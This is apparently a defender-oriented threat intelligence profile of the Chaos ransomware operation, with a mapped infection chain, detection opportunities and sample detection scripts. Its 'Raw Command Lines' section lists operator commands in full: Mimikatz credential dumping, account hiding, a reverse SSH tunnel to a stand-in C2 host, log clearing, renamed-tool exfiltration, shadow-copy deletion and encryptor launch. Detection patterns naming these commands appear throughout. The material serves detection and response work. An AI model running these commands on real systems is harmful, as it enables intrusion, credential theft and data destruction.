# Chaos Ransomware (BlackSuit Successor / ex-Royal)
**Type:** Ransomware-as-a-Service (RaaS) - Open Affiliate Model
**Also tracked as:** Ex-BlackSuit operators (Cisco Talos), ex-Royal/Conti lineage
**First observed:** February 2025 (RAMP forum recruitment), first leak site victim March 2025
**Status:** Active - 42 named leak site victims as of late March 2026. Steady cadence, not a volume leader. Opportunistic targeting with big-game hunting posture. Triple extortion model (data leak + encryption + DDoS threat).
---
## Threat Overview
Open RaaS operated by suspected former BlackSuit/Royal operators (Conti lineage). Emerged after DOJ seized BlackSuit infrastructure on July 24, 2025. Actively recruiting affiliates on RAMP. Cross-platform encryptor: Windows, ESXi, Linux, NAS. Encryption: ECDH (Curve25519) + AES-256 with per-file unique keys and operator-controlled master key.
**Double/triple extortion:** GoodSync exfil (renamed `wininit.exe`) followed by encryption via a configurable encryptor (`/lkey`, `/encrypt_step`, `/work_mode` params). Leak site on Tor. DDoS threat against non-payers (Recorded Future).
| Field | Value |
|---|---|
| Ransom note | `README.chaos.txt` (Windows) / `readme.chaos.txt` (Linux/ESXi) |
| File extension | `.chaos` |
| Contact | Tor leak site negotiation portal |
| Avg ransom demand | ~$300K (Cisco Talos) |
| Top targets (geo) | US (30), UK, New Zealand, India |
| Top targets (sector) | Technology (12), Financial Services (5), Manufacturing (3), Business Services (3), Transportation (2) |
| Encryption | ECDH Curve25519 + AES-256, selective partial-file encryption, per-file keys |
---
## Activity Standing
Not a top-5 operation by volume. Q1 2026 is dominated by **Qilin** (~1,302 trailing-12mo), **Akira**, LockBit5, and SafePay. Chaos's 42 named victims place it in the mid-tier, but the **BlackSuit/Royal/Conti pedigree** and cross-platform capability make it more dangerous than victim count suggests. The group's adoption of triple extortion (adding DDoS threats) signals operational maturity beyond typical spray-and-pray RaaS.
Cisco Talos assesses with moderate confidence that Chaos operators are former BlackSuit/Royal members, based on: encryption methodology overlap, ransom note structure similarity, and shared toolset preferences.
---
## Initial Access
**Primary:** Social engineering - email spam flood + voice phishing (vishing). Victim receives mass spam, calls attacker-controlled "IT helpdesk," attacker impersonates IT security, directs victim to launch **Microsoft Quick Assist** and connect to attacker's session. Not exploit-based. Human-operated from minute one.
**Secondary:** Opportunistic exploitation of unpatched edge devices, compromised RDP credentials. IAB-purchased access likely given RAMP presence and open affiliate model.
**Scale:** Opportunistic, no vertical focus. Predominantly US targets (71% of known victims).
---
## Infection Chain
### Step 1 - Initial Access: Email Spam Flood + Vishing
T1566.004, T1204.002 | Operator
Victim flooded with spam emails. Encouraged to call attacker-controlled number. Attacker impersonates IT security representative, instructs victim to launch **Microsoft Quick Assist** and connect to attacker's remote session. Immediate hands-on-keyboard access. No exploit, no payload delivery - pure social engineering.
> **Detection Opportunity:** Monitor for Quick Assist spawning child processes associated with remote management tool installers or command-line interpreters. This is a strong social engineering indicator - Quick Assist should not be launching MSI installers or scripting engines in normal use.
### Step 2 - Persistence: RMM Tool Deployment
T1219 | Operator
Installs multiple RMM tools for redundant persistence: **AnyDesk**, **ScreenConnect**, **OptiTune**, **Syncro RMM**, **Splashtop Streamer**. Multiple tools ensure access survives if one is detected and removed. Also sets up a **reverse SSH tunnel** over port 443 for encrypted C2.
> **Detection Opportunity:** Alert on rapid installation of multiple remote management tools within a short window on the same host. Also monitor for outbound SSH tunnels (particularly reverse tunnels) on non-standard ports or to unfamiliar infrastructure.
>
> See rule(s): [[edr-win-persist-rmm-deployment]] | [[edr-win-c2-reverse-tunneling]]
### Step 3 - Reconnaissance
T1033, T1016, T1018, T1069.002 | Operator
Post-compromise discovery: network config, domain controller enumeration, trust relationships, logged-in users, running processes, reverse DNS lookups. **ldapsearch** executed remotely via reverse SSH tunnel to dump AD user details to text file.
> **Detection Opportunity:** Watch for domain trust enumeration commands (`nltest /dclist`), privileged group enumeration (`net group "Domain Admins"`), and LDAP queries originating from non-domain-controller hosts - especially when these occur in rapid succession from the same source.
>
> See rule(s): [[edr-win-disc-net-priv-group-enum]] | [[edr-win-disc-nltest-domain-trusts]]
### Step 4 - Credential Access
T1003.001, T1558.003, T1134.001 | Operator
**Mimikatz** for LSASS credential harvesting. **Kerberoasting** to capture service account TGS tickets for offline cracking. Token impersonation for privilege escalation - modifies security descriptors, impersonates high-privilege security contexts to bypass file access restrictions. Password resets of enumerated domain accounts via `net.exe` (all set to same password).
> **Detection Opportunity:** Monitor for LSASS memory access patterns consistent with credential dumping (minidump creation, direct memory reads). Alert on Kerberoasting behavior - high-volume TGS requests for service accounts from a single host. Watch for bulk `net user /domain` password resets in rapid succession.
### Step 5 - Defense Evasion
T1036.005, T1070.001, T1562.001 | Operator
Process masquerading: ransomware binary disguised as `svchost.exe`, `explorer.exe`, or random strings. GoodSync exfil tool renamed to `wininit.exe`. Deletes **PowerShell event logs** to evade security controls. Attempts to uninstall security/MFA applications via WMIC. Registry modification to **hide user accounts** from Windows login screen (account still usable via RDP/runas).
> **Detection Opportunity:** Flag processes where the binary name matches a known Windows system process but the image path is outside the expected directory (e.g., `svchost.exe` running from a temp folder). Monitor for `wevtutil cl` targeting PowerShell logs specifically. Alert on registry writes to `SpecialAccounts\Userlist` with a DWORD value of 0 - this hides accounts from the login screen and is almost exclusively malicious.
>
> See rule: [[edr-win-def-defender-tampering]]
### Step 6 - Lateral Movement
T1021.001, T1021.002, T1047 | Operator
RDP using harvested/reset credentials. Impacket for SMB/WMI command execution. Multiple RMM tools provide GUI access across environment. Hidden accounts used for RDP without login screen visibility.
> **Detection Opportunity:** Monitor for Impacket-style SMB/WMI remote execution patterns, PsExec-like service creation on remote hosts, and RDP logins from accounts that were recently created or had passwords reset in bulk.
>
> See rule: [[edr-win-lat-impacket-wmiexec]]
### Step 7 - Exfiltration
T1567, T1036.005 | Operator
**GoodSync** file synchronization tool renamed to `wininit.exe`. Filters out large/uncommon file types to avoid detection. Exfils sensitive data before encryption to support double extortion.
> **Detection Opportunity:** Detect renamed file synchronization tools by comparing the process display name or internal metadata against the executable file name. A process reporting as "GoodSync" but running as `wininit.exe` is a strong indicator. Also watch for file sync tools filtering for high-value document types (`.docx`, `.xlsx`, `.pdf`, `.pst`) to external destinations.
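Added example, not code from Talos or any vendor tooling: a Python check over constructed Sysmon-style process-creation records that implements the Step 5 and Step 7 detection opportunities together: a system-process name running from outside the Windows directories, PE original filename disagreeing with the on-disk name (GoodSync as `wininit.exe`), the `SpecialAccounts\Userlist` DWORD-0 write, and `wevtutil cl` against the PowerShell logs. The directory allow-list, the record field names and the sample values are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Names Chaos operators reused for masquerading, and where they legitimately run from (assumed list).
SYSTEM_NAMES = {"svchost.exe", "explorer.exe", "wininit.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows")
USERLIST_RE = re.compile(r"winlogon\\specialaccounts\\userlist", re.I)   # account-hiding key
PS_LOGS = ("windows powershell", "microsoft-windows-powershell/operational")

def check_process(ev):
    """Findings for one process-creation record (fields: image, original_file_name, command_line)."""
    findings = []
    path = PureWindowsPath(ev["image"])
    name = path.name.lower()
    parent = str(path.parent).lower()
    # 1. Known system process name running from outside the Windows directories.
    if name in SYSTEM_NAMES and parent not in SYSTEM_DIRS:
        findings.append(f"masquerade_path:{name}:{parent}")
    # 2. PE metadata disagrees with the on-disk name (GoodSync renamed to wininit.exe).
    orig = (ev.get("original_file_name") or "").lower()
    if orig and orig != name:
        findings.append(f"masquerade_metadata:{orig}->{name}")
    cmd = ev.get("command_line", "").lower()
    # 3. reg add ... SpecialAccounts\Userlist ... /d 0 hides an account from the logon screen.
    if USERLIST_RE.search(cmd) and re.search(r"/d\s+0\b", cmd):
        findings.append("hidden_account")
    # 4. wevtutil cl aimed at the PowerShell logs specifically.
    if "wevtutil" in cmd and " cl " in cmd and any(log in cmd for log in PS_LOGS):
        findings.append("powershell_log_cleared")
    return findings

def scan(events):
    return {i: f for i, ev in enumerate(events) if (f := check_process(ev))}

SAMPLE_EVENTS = [  # constructed records, not from a real incident
    {"image": r"C:\Windows\System32\svchost.exe", "original_file_name": "svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
    {"image": r"C:\Users\Public\svchost.exe", "original_file_name": "Encryptor.exe",
     "command_line": "svchost.exe"},
    {"image": r"C:\ProgramData\wininit.exe", "original_file_name": "GoodSync.exe",
     "command_line": r'wininit.exe sync "D:\Share" "\\exfil\d"'},
    {"image": r"C:\Windows\System32\reg.exe", "original_file_name": "reg.exe",
     "command_line": r'reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v svc_backup /t REG_DWORD /d 0 /f'},
    {"image": r"C:\Windows\System32\wevtutil.exe", "original_file_name": "wevtutil.exe",
     "command_line": 'wevtutil cl "Microsoft-Windows-PowerShell/Operational"'},
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))   # event 0 is clean; 1-4 each produce findings
```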
### Step 8 - Impact (Encryption)
T1486, T1490 | Malware
Configurable encryptor deployed with operator parameters: `/lkey` (32-byte master key), `/encrypt_step` (0-100, selective partial-file encryption), `/work_mode` (local/network/local_network). ECDH Curve25519 + AES-256, per-file unique keys. Shadow copy deletion via `vssadmin`, `wmic`, `wbadmin`, `bcdedit`. Extension: `.chaos`. Ransom note: `README.chaos.txt`. Anti-analysis: anti-debug, anti-VM, anti-sandbox multi-layer evasion. Self-protection: `-delete` parameter triggers batch script loop to restore/re-execute if admin removes binary.
> **Detection Opportunity:** Alert on system recovery inhibition commands - `vssadmin delete shadows`, `bcdedit` boot policy modifications, `wbadmin delete catalog` - especially when multiple commands execute in rapid sequence. Monitor for processes with command-line parameters matching the `/lkey:` `/encrypt_step:` `/work_mode:` pattern. Watch for batch script loops that attempt to restore or re-execute a binary after deletion.
>
> See rule: [[edr-win-impact-inhibit-recovery]]
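Added example, not Talos's or any vendor's code: the Step 2 (rapid multi-RMM installation) and Step 8 (recovery-inhibition commands in rapid sequence) detection opportunities share one shape, "N distinct indicators on the same host inside a short window", so this Python block implements that windowed detector once and applies it to both, plus a separate check for the `/lkey:` `/encrypt_step:` `/work_mode:` parameter set. Thresholds, windows, record fields and the sample events are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Burst rules: name -> (min distinct patterns, window, command-line regexes). Thresholds are assumed.
BURST_RULES = {
    "rmm_tool_burst": (2, timedelta(minutes=10),
        [r"anydesk", r"screenconnect", r"optitune", r"syncro", r"splashtop"]),
    "inhibit_recovery_burst": (2, timedelta(minutes=2),
        [r"vssadmin.*delete\s+shadows", r"wmic\s+shadowcopy\s+delete",
         r"bcdedit.*(bootstatuspolicy|recoveryenabled)", r"wbadmin.*delete\s+catalog"]),
}
ENCRYPTOR_PARAMS = ("/lkey:", "/encrypt_step:", "/work_mode:")

def detect_bursts(events, rules=BURST_RULES):
    """(host, rule) -> matched regexes, for hosts where >= threshold distinct patterns fired in one window."""
    hits = defaultdict(list)                      # (host, rule) -> [(time, pattern_index)]
    for ev in events:
        ts, cmd = datetime.fromisoformat(ev["ts"]), ev["cmd"].lower()
        for rule, (_, _, patterns) in rules.items():
            for i, pat in enumerate(patterns):
                if re.search(pat, cmd):
                    hits[(ev["host"], rule)].append((ts, i))
    alerts = {}
    for (host, rule), rows in hits.items():
        threshold, window, patterns = rules[rule]
        rows.sort()
        for start, (t0, _) in enumerate(rows):   # slide the window from each hit
            distinct = {i for t, i in rows[start:] if t - t0 <= window}
            if len(distinct) >= threshold:
                alerts[(host, rule)] = {patterns[i] for i in distinct}
                break
    return alerts

def find_encryptor_launches(events):
    """Hosts where one process carried all three operator parameters at once."""
    return sorted({ev["host"] for ev in events
                   if all(p in ev["cmd"].lower() for p in ENCRYPTOR_PARAMS)})

SAMPLE_EVENTS = [  # constructed process-creation records, not from a real incident
    {"ts": "2025-07-10T09:00:00", "host": "WS01", "cmd": "msiexec.exe /i AnyDesk.msi /quiet"},
    {"ts": "2025-07-10T09:03:00", "host": "WS01", "cmd": "msiexec.exe /i ScreenConnect.ClientSetup.msi /quiet"},
    {"ts": "2025-07-10T14:00:00", "host": "FS01", "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2025-07-10T14:00:05", "host": "FS01", "cmd": "bcdedit.exe /set {default} recoveryenabled no"},
    {"ts": "2025-07-10T14:00:09", "host": "FS01", "cmd": "wbadmin.exe delete catalog -quiet"},
    {"ts": "2025-07-10T14:00:20", "host": "FS01", "cmd": 'Encryptor.exe /lkey:"<32_BYTE_KEY>" /encrypt_step:50 /work_mode:local_network'},
    {"ts": "2025-07-10T10:00:00", "host": "WS02", "cmd": "vssadmin.exe delete shadows /all /quiet"},  # lone admin run, no burst
]
```

WS01 fires the RMM rule on two installs three minutes apart, FS01 fires the recovery rule on three distinct commands within nine seconds and is the only encryptor launch, while WS02's single `vssadmin` run stays silent.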
---
## Raw Command Lines
Observed operator commands from Cisco Talos IR engagements and vendor reporting. `[R]` = reconstructed from described behavior.
**Reconnaissance**
```
whoami
ipconfig /all
nltest /dclist:
net group "Domain Admins" /domain
net user /domain
tasklist
nslookup <TARGET_IP>
ldapsearch -x -H ldap://<DC_IP> -b "dc=<DOMAIN>,dc=com" -D "<USER>@<DOMAIN>" -w <PASSWORD> "(objectClass=user)" > users.txt [R]
```
**Credential access**
```
sekurlsa::logonpasswords
lsadump::sam
privilege::debug
net user <USERNAME> <NEWPASSWORD> /domain
```
**Account hiding**
```
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v <USERNAME> /t REG_DWORD /d 0 /f
```
**RMM tool installation**
```
msiexec.exe /i AnyDesk.msi /quiet [R]
msiexec.exe /i ScreenConnect.ClientSetup.msi /quiet [R]
```
**Reverse SSH tunnel**
```
ssh -R 443:<LOCAL_IP>:22 <C2_USER>@<C2_IP> -fN [R]
```
**Anti-forensics**
```
wevtutil cl "Windows PowerShell" [R]
wevtutil cl "Microsoft-Windows-PowerShell/Operational" [R]
wmic product where "name like '%<SECURITY_APP>%'" call uninstall /nointeractive [R]
```
**Exfiltration (GoodSync masquerading)**
```
wininit.exe sync "<SOURCE_PATH>" "<DEST_PATH>" --include "*.docx" --include "*.xlsx" --include "*.pdf" --include "*.pst" [R]
```
**Shadow copy deletion**
```
vssadmin.exe delete shadows /all /quiet
wmic shadowcopy delete
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
wbadmin.exe delete catalog -quiet
```
**Ransomware execution**
```
Encryptor.exe /lkey:"<32_BYTE_KEY>" /encrypt_step:50 /work_mode:local_network
```
---
## Intelligence Gaps
- **Affiliate diversity unknown** - Open RaaS on RAMP - TTPs may diverge significantly across affiliates. Talos reporting reflects one observed operator playbook.
- **ESXi/Linux encryptor underdocumented** - Cross-platform capability confirmed but no public IR report with Linux/ESXi-specific TTPs or commands.
- **DDoS capability unverified** - Recorded Future reports DDoS as third extortion lever, but no public incident confirms actual DDoS execution.
- **C2 infrastructure opaque** - Reverse SSH tunnels and RMM tools are the observed C2 channels. No custom C2 framework identified.
- **Overlap with Trinity of Chaos unclear** - "Trinity of Chaos" (LAPSUS$/ShinyHunters/Scattered Spider alliance) is a separate entity. Any operational overlap with the Chaos RaaS is unconfirmed.
- **Distinction from 2021 Chaos builder** - The 2021 Chaos ransomware builder (Ryuk .NET clone that evolved from wiper to real encryptor) is a completely separate lineage. The 2025 Chaos RaaS reuses only the name. Vendors have confirmed no code-level connection.
---
## Confidence Assessment
| Claim | Confidence | Evidence | Flips if... |
|---|---|---|---|
| BlackSuit/Royal lineage | MEDIUM | Talos "moderate confidence," encryption overlap, note structure, toolset similarity | Code analysis proves independent dev |
| Conti lineage (via Royal to BlackSuit) | MEDIUM | Transitive - Royal = Conti offshoot, BlackSuit = Royal rebrand | BlackSuit operators were independent affiliates |
| Distinct from 2021 Chaos builder | HIGH | Multiple vendors confirm, no code overlap, different encryption (ECDH+AES vs .NET/Ryuk clone) | Code reuse discovered |
| Cross-platform (Win/ESXi/Linux/NAS) | HIGH | RAMP advertisements, vendor confirmation | Marketing only, no Linux samples analyzed |
| Triple extortion (data + encrypt + DDoS) | MEDIUM | Recorded Future reporting, Talos negotiation obs | DDoS threat is bluff, never executed |
| RAMP-based recruitment | HIGH | Direct forum observation by multiple vendors | Forum post is honeypot or impersonation |
---
## Detections
Sigma rules applicable to this threat:
| Rule ID | Description |
|---|---|
| [[edr-win-disc-net-priv-group-enum]] | Privileged Domain Group Enumeration via Net |
| [[edr-win-disc-nltest-domain-trusts]] | Domain Trust Enumeration via Nltest |
| [[edr-win-disc-netscan-deployment]] | SoftPerfect Network Scanner Execution |
| [[edr-win-cred-browser-esentutl]] | Browser Credential Theft via Esentutl |
| [[edr-win-lat-impacket-wmiexec]] | Impacket WmiExec Lateral Movement |
| [[edr-win-impact-inhibit-recovery]] | System Recovery Inhibition |
| [[edr-win-def-defender-tampering]] | Windows Defender Tampering via PowerShell |
| [[edr-win-c2-reverse-tunneling]] | Reverse Tunnel Tool Execution |
| [[edr-win-persist-rmm-deployment]] | Unauthorized RMM Tool Deployment |
---
## Key Publications
1. [Cisco Talos - Unmasking the new Chaos RaaS group attacks](https://blog.talosintelligence.com/new-chaos-ransomware/) (Jul 2025) - Primary technical reference. IR-based TTPs, encryption analysis, social engineering chain.
2. [ExtraHop - CHAOS in a BLACKSUIT: Triple Extortion Ransomware](https://www.extrahop.com/blog/chaos-in-a-blacksuit-triple-extortion-ransomware) (2025) - BlackSuit succession, triple extortion model, network detection perspective.
3. [FortiGuard Labs - Evolution of Chaos Ransomware](https://www.fortinet.com/blog/threat-research/evolution-of-chaos-ransomware-faster-smarter-and-more-dangerous) (2025) - C++ variant analysis (NOTE: covers 2021 Chaos builder evolution, not 2025 RaaS).
4. [Ransomware.live - Chaos Tracker](https://www.ransomware.live/group/chaos) (ongoing) - 42 victims, sector/geo breakdown.
5. [ANY.RUN - Chaos Ransomware Analysis](https://any.run/malware-trends/chaos/) (ongoing) - Sandbox analysis, behavioral indicators.
6. [Cyble - 10 New Ransomware Groups of 2025](https://cyble.com/knowledge-hub/10-new-ransomware-groups-of-2025-threat-trend-2026/) (2025) - Chaos in broader RaaS landscape context.